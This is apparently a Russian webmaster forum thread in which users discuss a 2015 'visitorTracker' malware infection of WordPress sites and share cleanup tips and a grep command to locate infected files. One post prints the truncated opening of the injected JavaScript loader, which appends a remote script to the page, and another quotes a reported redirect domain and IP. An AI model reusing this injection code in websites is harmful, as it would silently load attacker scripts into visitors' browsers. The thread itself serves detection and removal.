Помощник
 |
|
|
|
|
Сообщение сайта
|
 "Дыра" в Wordpress |
mmkulikov
|
Сообщение
#1
|
||
 Старожил  Группа: Active User Сообщений: 2414 Регистрация: 21.9.2012 Из: СССР Поблагодарили: 685 раз Репутация:  76 
 |
|
||
 |
|
||
|
Vreg
|
 29.9.2015, 13:58;
Ответить: Vreg
Сообщение
#2
|
 3,14159265358979323846264 Группа: Super Moderator Сообщений: 2214 Регистрация: 28.12.2011 Из: Курган Поблагодарили: 1639 раз Репутация: 205
|
Каким образом проверяли?
|
|
|
|
|
mmkulikov
|
Сообщение
#3
|
|
Старожил Группа: Active User Сообщений: 2414 Регистрация: 21.9.2012 Из: СССР Поблагодарили: 685 раз Репутация: 76
|
Цитата(Vreg @ 29.9.2015, 11:58)  Каким образом проверяли? Для начала получил "письмо счастья" от гугла, а потом все сайты руками Находится легко, благо не шифруется Вот пример начала зараженного файла js Код /*visitorTracker*/ var visitortrackerin = setInterval(function(){ if(document.body != null && typeof document.body != "undefined"){ clearInterval(visitortrackerin); if(typeof window["globalvisitor"] == "undefined"){ window["globalvisitor"] = 1; var isIE = visitortrackerde(); var isChrome = !isIE && !!window.chrome && window.navigator.vendor === "Google Inc."; if(visitorTracker_isMob()){ var visitortrackervs = document.createElement("script"); visitortrackervs.src = "http://здесь_потер_урл_своего_сайта/wp-includes/SimplePie/Content/Type/main_configs/tracks.php?mob=1"; document.getElementsByTagName("head")[0].appendChild(visitortrackervs); }else{ Удаляем все найденные куски (они все только в начале файла) между /*visitorTracker*/код_трояна/*visitorTracker*/ Ну и папку с файлом (может распологаться по разному и называться по разному) В данном примере это wp-includes/SimplePie/Content/Type/main_configs/tracks.php Где-то так-с 
-------------------- |
|
|
|
|
Вентилятор
|
29.9.2015, 14:20;
Ответить: Вентилятор
Сообщение
#4
|
 покупаю хорошие проекты Группа: Active User Сообщений: 1938 Регистрация: 8.8.2010 Поблагодарили: 663 раза Репутация: 112
|
Цитата(mmkulikov @ 29.9.2015, 12:56) Вот подробно о заразе "Исследователи пишут, что сейчас малварь отсылает пользователей на vovagandon.tk (193.169.244.159)" ))) |
|
|
|
|
x64
|
29.9.2015, 16:08;
Ответить: x64
Сообщение
#5
|
 F.A.L.L.O.U.T. Группа: Active User Сообщений: 4055 Регистрация: 30.6.2011 Из: Железнодорожный (Балашиха) Поблагодарили: 3409 раз Репутация: 331
|
Поискать файлы можно так: коннектимся по SSH и выполняем команду:
Код find /путь/к/сайтам/ -name '*.php' | xargs -n1 grep -rlF 'VisitorTracker' |
|
|
|
kagtus
|
29.9.2015, 17:11;
Ответить: kagtus
Сообщение
#6
|
|
Бывалый Группа: User Сообщений: 421 Регистрация: 11.10.2012 Из: Kostroma Поблагодарили: 95 раз Репутация: 22
|
ТС, из какой фразы статьи вытекает, что
Цитата на сайтах под управлением WordPress (включая самую последнюю) ??? Сообщение отредактировал kagtus - 29.9.2015, 17:12 -------------------- |
|
|
|
|
siteSgun
|
30.9.2015, 2:33;
Ответить: siteSgun
Сообщение
#7
|
 Частый гость Группа: User Сообщений: 59 Регистрация: 9.9.2015 Поблагодарили: 13 раз Репутация: 2
|
Цитата(mmkulikov @ 29.9.2015, 13:56) Эпидемия новой заразы на сайтах под управлением WordPress (включая самую последнюю) Как раз самые последние версии, чаще всего, и подвержены подобным "налетам". Шанс найти уязвимость и широкое распространение не оставляет шансов остаться без внимания у хакеров. Есть же стабильные предыдущие релизы, зачем каждый раз торопиться с обновлениями?.. |
|
|
|
|
mmkulikov
|
Сообщение
#8
|
|
Старожил Группа: Active User Сообщений: 2414 Регистрация: 21.9.2012 Из: СССР Поблагодарили: 685 раз Репутация: 76
|
Цитата(x64 @ 29.9.2015, 14:08) find /путь/к/сайтам/ -name '*.php' | xargs -n1 grep -rlF 'VisitorTracker' Сегодня обнаружил "клон" этой заразы с уже другой сигнатурой /*161557fbea2c302f309892cd115a35aa*/ Вот же га...  P.S. Кстати - ошибочка ) Не *.php надо, а *.js Эта дрянь "живет" в js скриптах Сообщение отредактировал mmkulikov - 30.9.2015, 11:57 -------------------- |
|
|
|
|
x64
|
30.9.2015, 12:03;
Ответить: x64
Сообщение
#9
|
|
F.A.L.L.O.U.T. Группа: Active User Сообщений: 4055 Регистрация: 30.6.2011 Из: Железнодорожный (Балашиха) Поблагодарили: 3409 раз Репутация: 331
|
Цитата(mmkulikov @ 30.9.2015, 10:55) Кстати - ошибочка ) Не *.php надо, а *.js Да хоть по всем файлам, но это ж долго, если что-то тяжёлое есть  Код '*.php' → '*'
|
|
|
|
|
mmkulikov
|
Сообщение
#10
|
|
Старожил Группа: Active User Сообщений: 2414 Регистрация: 21.9.2012 Из: СССР Поблагодарили: 685 раз Репутация: 76
|
Цитата(x64 @ 30.9.2015, 10:03) Да хоть по всем файлам, но это ж долго У меня "сидело" и в "безликих" tetqwqsad0ehSvo и т.п. (около 3000 файлов) И 'VisitorTracker' уже не панацея  Благо "стиль" заражения пока остался. Ключевое сло здесь наверное "пока" 
-------------------- |
|
|
|
|
|
Похожие темы
| Тема | Ответов | Автор | Просмотров | Последний ответ | |
|---|---|---|---|---|---|
 |
 Продам базу сайтов Wordpress в 16 миллионов доменов! Свежая сборка. |
19 | Boymaster | 11070 | Сегодня, 0:01 автор: Boymaster |
|
Хостинг "Hostland" - качественный хостинг по разумным ценам и со своей Панелью Управления | 0 | artmeteor | 374 | 18.4.2024, 22:46 автор: artmeteor |
|
⭐⭐⭐ Google Voice | Gmail - OLD аккаунты "SMS и звонки" ⭐⭐⭐ | 15 | Chekon | 4444 | 18.4.2024, 12:00 автор: Chekon |
|
✅ sms.chekons.com - ⭐ Сервис для получения SMS на реальные номера USA "Non-VoIP, безлим SMS, API" ⭐ Сервис для получения SMS на реальные номера USA |
13 | Chekon | 4078 | 18.4.2024, 11:48 автор: Chekon |
|
Требуется помощь по сайту на "ВордПресс" Закрылся доступ в панель администратора |
15 | Tia2 | 2349 | 17.4.2024, 0:54 автор: diviner99 |
|
Текстовая версия | Сейчас: 20.4.2024, 0:08 |
